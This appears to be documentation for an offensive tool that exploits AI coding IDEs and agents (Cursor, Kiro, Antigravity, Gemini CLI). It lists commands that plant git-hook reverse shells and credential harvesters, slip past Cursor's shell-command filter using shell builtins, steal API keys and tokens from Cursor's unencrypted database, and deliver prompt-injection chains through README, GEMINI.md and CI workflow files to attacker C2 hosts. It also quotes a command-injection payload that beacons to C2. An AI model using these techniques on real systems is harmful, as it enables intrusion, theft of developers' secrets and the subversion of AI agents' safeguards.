SPECTER CURSOR Docs — AI Coding IDE Exploitation Engine

Installation

pip install specter-cursor

# Verify installation
specter-cursor --version
# specter-cursor 1.0.0

# CLI entry point
specter-cursor [COMMAND] [OPTIONS]

Gate System

SPECTER CURSOR uses a 3-tier gate system. Higher gates require additional keys and unlock more destructive capabilities.

Gate	Env Var	Unlocks
OPEN	—	ENUM-IDES, REPORT
INJECT	`CURSOR_INJECT_KEY`	CURSORJACKING, BUILTIN-BREAK
UNLEASHED	`CURSOR_UNLEASHED_KEY`	GIT-HOOK-RCE, NOMSHUB, KIRO-CHAIN, ANTIGRAVITY

All INJECT and UNLEASHED operations require explicit authorisation. Reports are signed with Ed25519 (CUR-{hex12} prefix). Sessions stored at ~/.specter/cursor/sessions/ with 600 permissions.

Commands

enum-ides

specter-cursor enum-ides [--output-dir DIR] [--session-id ID]

Enumerate installed AI coding IDEs. Detects Cursor, Kiro, Antigravity, Gemini CLI, Windsurf. Reports version, CVE exposure, auto-run mode status, extension count, SQLite DB path.

Output: JSON EnumResult with ides_found, total_cves, highest_cvss, cursor_db_path, unpatched_cves.

git-hook-rce

specter-cursor git-hook-rce \
  --target DIR \
  --c2-host HOST \
  --c2-port PORT \
  --hook-type pre-commit|post-merge|post-checkout \
  --payload reverse_shell|credential_harvest|ssh_inject \
  [--session-id ID]

Delivers CVE-2026-26268 (CVSS 9.9). Creates malicious embedded bare repository at .git-cache/upstream/. Hook fires when Cursor AI agent performs any git operation. Generates README and .gitmodules to disguise the embedded repo.

Gate: UNLEASHED

builtin-break

specter-cursor builtin-break \
  --target DIR \
  --c2 URL \
  --technique export_pythonpath|git_ssh_command|path_shadow|declare_function|git_pager|git_editor|ld_preload|typeset_zsh \
  [--session-id ID]

Exploits CVE-2026-22708 (CVSS 8.5). Generates stage1 script (shell builtin, invisible to Cursor filter) and stage2 trigger (trusted by allowlist). 8 techniques available.

Gate: INJECT

nomshub

specter-cursor nomshub \
  --output-dir DIR \
  --c2 URL \
  [--tunnel-name NAME] \
  [--session-id ID]

3-stage attack chain. Creates: README.md (Stage 1 HTML comment injection), workspace-sync.sh (Stage 2 escape + harvest, executable), TUNNEL_ACCESS.md (Stage 3 tunnel documentation). Tunnel name auto-generated if not specified.

Gate: UNLEASHED

cursorjacking

specter-cursor cursorjacking \
  --output-dir DIR \
  --c2 URL \
  --method direct|extension|both \
  [--db-path PATH] \
  [--lure-index N] \
  [--session-id ID]

Harvests credentials from Cursor's state.vscdb SQLite store. Direct mode: copy-then-query DB immediately. Extension mode: generate malicious VS Code extension scaffold (activates on startup, hourly harvest). Both: combined.

Gate: INJECT

kiro-chain

specter-cursor kiro-chain \
  --target DIR \
  --c2 URL \
  [--cve CVE-2026-0830|CVE-2026-5429|CVE-2026-10591|all] \
  [--payload-type beacon|reverse_shell|credential_harvest] \
  [--session-id ID]

Delivers Kiro triple-CVE chain. Default: all 3 CVEs simultaneously. total_cvss = max(individual CVSSes) = 9.1. Chain description lists all CVEs delivered.

Gate: UNLEASHED

antigravity

specter-cursor antigravity \
  --output-dir DIR \
  --c2 URL \
  [--chain groundfall|gemini_cli_ci|all] \
  [--payload-type beacon|reverse_shell|credential_harvest] \
  [--session-id ID]

Two chains: Groundfall (fd flag injection CVSS 9.3, creates prompt_injection.txt + .antigravity/config.json + README.md) and Gemini CLI CI (CVSS 10.0, creates GEMINI.md + .gemini/config.json + .github/workflows/ai-review.yml + ci_harvest.sh). Highest CVSS = 10.0 when both chains active.

Gate: UNLEASHED

report

specter-cursor report [--session-id ID] [--output-dir DIR]

Generate signed CUR-{hex12} report. Includes: tool metadata, session findings, evidence, WMD classes, MITRE ATT&CK/ATLAS mapping (≥8 ATT&CK, ≥3 ATLAS), attack flow diagram, remediation. Saved as JSON with 600 permissions.

CVE Technical Reference

CVE-2026-26268 (CVSS 9.9, CWE-862)

Cursor IDE embedded bare repository support does not restrict hook execution to the outer repository
Agent commit operations traverse into .git-cache/upstream/ and execute hooks without sandbox restriction
Hook fires as full developer user with no permission prompt
Fixed: Cursor v2.5 — bare repo hooks now sandboxed

CVE-2026-22708 (CVSS 8.5, CWE-693)

shouldBlockShellCommand inspects command tokens but shell builtins are not tokenised as commands
Builtins (export, declare, typeset) execute before any command is formed — bypass is structural, not evasion
Requires Cursor Auto-Run Mode enabled (cursor.agentAutoRun: true)
Fixed: Cursor v2.3 — builtins now blocked in auto-run mode

CursorJacking (CVSS 8.2, NO PATCH)

state.vscdb SQLite file stores all secrets without encryption
File permissions allow any extension to read without elevated access
Affected keys: cursorAuth/accessToken, cursor.anthropicApiKey, cursor.openaiApiKey, github.oauth.accesstoken, cursor.awsAccessKeyId, etc.
Cursor declined to fix (Feb 2026): "by design, consistent with VS Code extension model"

Kiro CVE-2026-0830 (CVSS 9.1, CWE-78)

GitLab MR helper: child_process.exec(`cd ${workingDir}; git branch`)
Injection: folder named project;curl -sf C2/beacon &;#
Delimiter ; terminates the cd command, # comments out git branch
Fixed: Kiro v0.6.18 — workingDir now quoted and validated

GHSA-wpqr-6v78-jr5g (CVSS 10.0, Gemini CLI)

Headless mode (--headless, --auto-approve) skips workspace trust prompt
Reads GEMINI.md and .gemini/config.json from PR branch without sandboxing
on_load shell commands execute with full CI runner environment
Fixed: Gemini CLI v0.39.1 — headless mode requires explicit workspace trust flag

Session Management

# Sessions stored at
~/.specter/cursor/sessions/{session-id}.json

# File permissions: 600
# Format: JSON with findings, evidence, metadata

# Load existing session
specter-cursor report --session-id CUR-abc123def456

Report Format

{
  "tool": "SPECTER CURSOR",
  "tool_id": "T138",
  "layer": "L27",
  "version": "1.0.0",
  "report_id": "CUR-{hex12}",
  "timestamp": "ISO8601",
  "wmd_classes": ["ai_ide_zero_click_rce", ...],
  "mitre_attack": ["T1059.004", "T1547.001", ...],
  "mitre_atlas": ["AML.T0054", ...],
  "session_id": "...",
  "attack_flow": "ENUM-IDES → GIT-HOOK-RCE → CURSORJACKING → NOMSHUB → REPORT",
  "remediation": {
    "git_hook_restriction": "...",
    "shell_builtin_blocking": "...",
    ...
  }
}

MITRE ATT&CK / ATLAS Mapping

Technique	ID	Subsystem
Command and Scripting Interpreter: Unix Shell	T1059.004	BUILTIN-BREAK, NOMSHUB
Event Triggered Execution: Git Hooks	T1547.001	GIT-HOOK-RCE
Credentials from Password Stores	T1555	CURSORJACKING
Supply Chain Compromise: Compromise Software Dependencies	T1195.001	GIT-HOOK-RCE, KIRO-CHAIN
Ingress Tool Transfer	T1105	NOMSHUB
Application Layer Protocol: Web Protocols	T1071.001	NOMSHUB (Azure tunnel)
Exfiltration Over C2 Channel	T1041	CURSORJACKING, NOMSHUB
Hijack Execution Flow: LD_PRELOAD	T1574.006	BUILTIN-BREAK
ML Supply Chain Compromise	AML.T0010	GIT-HOOK-RCE
Discover ML Model Ontology	AML.T0013	ENUM-IDES
Craft Adversarial Data	AML.T0043	NOMSHUB (prompt injection)

SPECTER CURSOR — Documentation

Installation

Gate System

Commands

enum-ides

git-hook-rce

builtin-break

nomshub

cursorjacking

kiro-chain

antigravity

report

CVE Technical Reference

CVE-2026-26268 (CVSS 9.9, CWE-862)

CVE-2026-22708 (CVSS 8.5, CWE-693)

CursorJacking (CVSS 8.2, NO PATCH)

Kiro CVE-2026-0830 (CVSS 9.1, CWE-78)

GHSA-wpqr-6v78-jr5g (CVSS 10.0, Gemini CLI)

Session Management

Report Format

MITRE ATT&CK / ATLAS Mapping